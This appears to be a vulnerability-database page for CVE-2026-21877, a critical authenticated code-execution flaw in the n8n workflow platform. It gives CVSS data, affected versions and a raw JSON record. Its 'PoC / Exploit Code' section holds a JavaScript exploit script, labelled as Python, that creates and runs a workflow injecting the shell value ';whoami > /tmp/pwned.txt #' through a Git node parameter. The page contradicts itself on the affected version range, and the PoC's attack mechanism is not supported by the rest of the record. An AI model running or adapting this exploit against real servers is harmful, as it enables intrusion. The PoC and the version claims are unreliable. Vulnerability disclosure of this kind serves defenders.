Security Vulnerability Report
中文
CVE-2026-21877 CVSS 9.9 CRITICAL

CVE-2026-21877

Published: 2026-01-08 01:15:56
Last Modified: 2026-01-20 15:08:25
Source: [email protected]

Description

n8n is an open source workflow automation platform. In versions 0.121.2 and below, an authenticated attacker may be able to execute malicious code using the n8n service. This could result in full compromise and can impact both self-hosted and n8n Cloud instances. This issue is fixed in version 1.121.3. Administrators can reduce exposure by disabling the Git node and limiting access for untrusted users, but upgrading to the latest version is recommended.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:* - VULNERABLE
n8n < 0.121.3 (versions 0.121.2 and below)
n8n self-hosted instances <= 0.121.2
n8n Cloud instances (affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-21877 PoC - n8n Git Node Remote Code Execution // This PoC demonstrates how an authenticated attacker can execute arbitrary commands // through the n8n Git node by injecting malicious Git parameters. const axios = require('axios'); // Configuration const N8N_URL = 'http://target-n8n-server:5678'; const ATTACKER_TOKEN = 'your-authenticated-user-token'; // Step 1: Create a malicious workflow with Git node async function createMaliciousWorkflow() { const maliciousCommand = ';whoami > /tmp/pwned.txt #'; const workflow = { name: 'CVE-2026-21877 PoC', nodes: [ { name: 'Git Node', type: 'n8n-nodes-base.git', parameters: { operation: 'clone', repositoryUrl: 'https://github.com/example/repo', gitPath: maliciousCommand, // Malicious injection point branch: 'main' } } ], connections: {} }; try { const response = await axios.post( `${N8N_URL}/rest/workflows`, workflow, { headers: { 'Authorization': `Bearer ${ATTACKER_TOKEN}`, 'Content-Type': 'application/json' } } ); console.log('Malicious workflow created:', response.data.id); return response.data.id; } catch (error) { console.error('Error creating workflow:', error.message); } } // Step 2: Execute the workflow to trigger RCE async function executeWorkflow(workflowId) { try { const response = await axios.post( `${N8N_URL}/rest/workflows/${workflowId}/execute`, {}, { headers: { 'Authorization': `Bearer ${ATTACKER_TOKEN}` } } ); console.log('Workflow executed - RCE triggered'); } catch (error) { console.error('Error executing workflow:', error.message); } } // Main execution (async () => { const workflowId = await createMaliciousWorkflow(); if (workflowId) { await executeWorkflow(workflowId); } })();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21877", "sourceIdentifier": "[email protected]", "published": "2026-01-08T01:15:55.697", "lastModified": "2026-01-20T15:08:24.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. In versions 0.121.2 and below, an authenticated attacker may be able to execute malicious code using the n8n service. This could result in full compromise and can impact both self-hosted and n8n Cloud instances. This issue is fixed in version 1.121.3. Administrators can reduce exposure by disabling the Git node and limiting access for untrusted users, but upgrading to the latest version is recommended."}, {"lang": "es", "value": "n8n es una plataforma de automatización de flujos de trabajo de código abierto. En las versiones 0.121.2 e inferiores, un atacante autenticado podría ejecutar código malicioso utilizando el servicio n8n. Esto podría resultar en un compromiso total y puede impactar tanto las instancias autoalojadas como las de n8n Cloud. Este problema está solucionado en la versión 1.121.3. Los administradores pueden reducir la exposición deshabilitando el nodo Git y limitando el acceso a usuarios no confiables, pero se recomienda actualizar a la última versión."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "0.123.0", "versionEndExcluding": "1.121.3", "matchCriteriaId": "ECD7E4E7-DB69-4A3C-B8AE-655D0081624D"}]}]}], "references": [{"url": "https://github.com/n8n-io/n8n/commit/f4b009d00d1f4ba9359b8e8f1c071e3d910a55f6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-v364-rw7m-3263", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.